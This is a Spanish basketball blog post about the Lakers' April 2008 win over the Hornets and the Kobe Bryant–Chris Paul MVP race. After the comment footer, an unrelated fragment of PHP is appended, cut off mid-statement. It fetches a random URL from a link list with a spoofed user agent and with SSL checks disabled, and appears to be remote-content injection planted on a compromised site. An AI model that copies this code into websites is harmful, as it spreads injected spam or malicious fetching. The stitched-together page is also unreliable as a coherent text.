Las dos caras de la verdad

12 de April de 2008 por Gallis

Todas las miradas estaban puestas anoche en el Staples Center y los protagonistas de la batalla del oeste no decepcionaron. Kobe BryantLos Angeles Lakers acabaron imponiendose a Chris Paul y sus New Orleans Hornets (107-104). La primera consecuencia es evidente. Los Lakers se sitúan a medio partido de los Hornets y mantienen viva la lucha por la primera plaza del salvaje oeste. Si los angelinos son capaces de ganar sus 2 últimos partidos, los Hornets deberán ganar los 3 que les quedan, ya que de perder uno, el empate con los Lakers se resolvería a favor de los hombres de Phil Jackson. La serie particular entre ambos equipos está igualada y los Lakers tendrían mejor récord contra equipos de la conferencia oeste. Pero más allá de esta lucha, que todavía puede dar muchas vueltas y de la que todavía no hay que descartar a los San Antonio Spurs, en el partido de ayer había muchas más cosas en juego. Ambos equipos ofrecen dudas sobre como serán capaces de afrontar los Playoffs que comienzan dentro de exactamente una semana y además, Kobe y Paul tenían una nueva (y quién sabe si definitiva) oportunidad de convencer a la gente de quién es el MVP de la temporada. Y tras 48 minutos propios de una montaña rusa, ambos equipos y ambas superestrellas dejaron motivos para ser tan optimistas como pesimistas.

Los Lakers de los primeros 24 minutos son lo más parecido que puede haber en el oeste a un favorito para llegar a la final. La agresividad e intensidad defensiva mostrada por los hombres de Phil Jackson desarboló por completo a uno de los equipos con mayor cantidad de talento, al menos en su quinteto titular. Fisher se encargaba de mostrarle a Paul un anticipo de lo que le espera en Playoffs, Odom secaba a David West y los Lakers cerraban el rebote con una superioridad insultante, ayudados por los problemas de faltas de Chandler. Ésto, unido a una gran fluidez ofensiva ponía a los Lakers 63-33 muy avanzado ya el segundo cuarto. La imagen de los de Phil Jackson hacía olvidar derrotas inesperadas, las ausencias de Bynum y Ariza y los muchos problemas físicos que arrastran los que están. Mientras, los Hornets repetían las malas señales que ya dejaron en partidos anteriores y reafirmaban las muchas dudas que generan su falta de experiencia en los Playoffs.

Pero llegó la segunda parte y, quién sabe si por méritos de unos o deméritos de otros, la situación dió un giro de 180 grados. La “defensa” de los Lakers volvió a ser la exhibida ante Charlotte o ante Memphis y en ataque el triangulo se diluía en una sucesión de lanzamientos triples mal seleccionados. New Orleans mientras, sacaba la calidad que le tiene, por ahora, en el puesto más privilegiado del oeste y paso a paso se acercaba en el marcador. Paul tomaba la batuta del juego y West comenzaba a ver aro, pero eran otros los verdaderos protagonistas. Pedja Stojakovic continuaba su idilio con los aros en el Staples y anotaba un triple tras otro mientras Tyson Chandler dominaba ambas zonas. Así hasta llegar a los últimos minutos donde la tensión cambiaba de bando por segundos. Las 3 últimas acciones defensivas de los Lakers, 2 robos y un tapón acabaron decantando el partido a favor de los locales. Un partido en el que todos tienen muchas cosas que analizar, pero muchos argumentos para afrontar los Playoffs con ilusión y confianza.

Mientras, la lucha por el MVP seguía un camino paralelo al transcurrir del partido. La primera parte de Kobe Bryant es sencillamente perfecta. El 24 de los Lakers anotaba, asistía, reboteaba y defendía con una gran sensación de superioridad, mientras las gradas de Los Angeles entonaban una y otra vez eso de MVP!, MVP!. Y todo esto con un Paul abrumado por la defensa amarilla, incapaz de anotar su primera canasta en juego hasta que los Lakers su pusieron 30 arriba. En la segunda parte, Paul, sin llegar a alcanzar un nivel propio de MVP, daba un paso adelante y pese a su mal día en el lanzamiento, lograba conectar una y otra vez con sus compañeros. Mientras, Bryant desaparecía durante tramos del partido y pese a algunas acciones brillantes y a la seguridad que siempre da en los últimos cuartos, la imagen de la primera parte oscurecía su actuación. En definitiva, pese a sus números (Bryant: 30-10-8; Paul: 15-6-17), habituales en ambos jugadores, podría decirse que ninguno añadió anoche razones para conseguir el galardón, aunque quizá Paul perdiera el favor de alguno de los votantes.

Pero la lucha por la primera plaza del oeste, con todas sus implicaciones, no era lo único en juego anoche. Los Houston Rockets dieron un paso importantísimo en su lucha por la quinta plaza al derrotar a su rival directo, los Phoenix Suns. Una derrota que, por cierto convierte a los Lakers en el campeón de la división Pacifico por primera vez desde 2004. Y a la espera de su visita de mañana al Staples, San Antonio cumplía con el trámite de derrotar a Seattle. Mientras, en el este, la derrota de Philadelphia y la victoria de Toronto deja a ambos equipos empatados por la sexta plaza con ventaja, de momento, para los canadienses. En juego, evitar a los Pistons en primera ronda. La derrota de Cleveland en Chicago amagaba con poner en peligro la cuarta plaza de los Lebrones, hasta que Detroit daba buena cuenta de Washington.

Un día menos para acabar la regular season y, afortunadamente, todavía hay demasiado en juego. 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>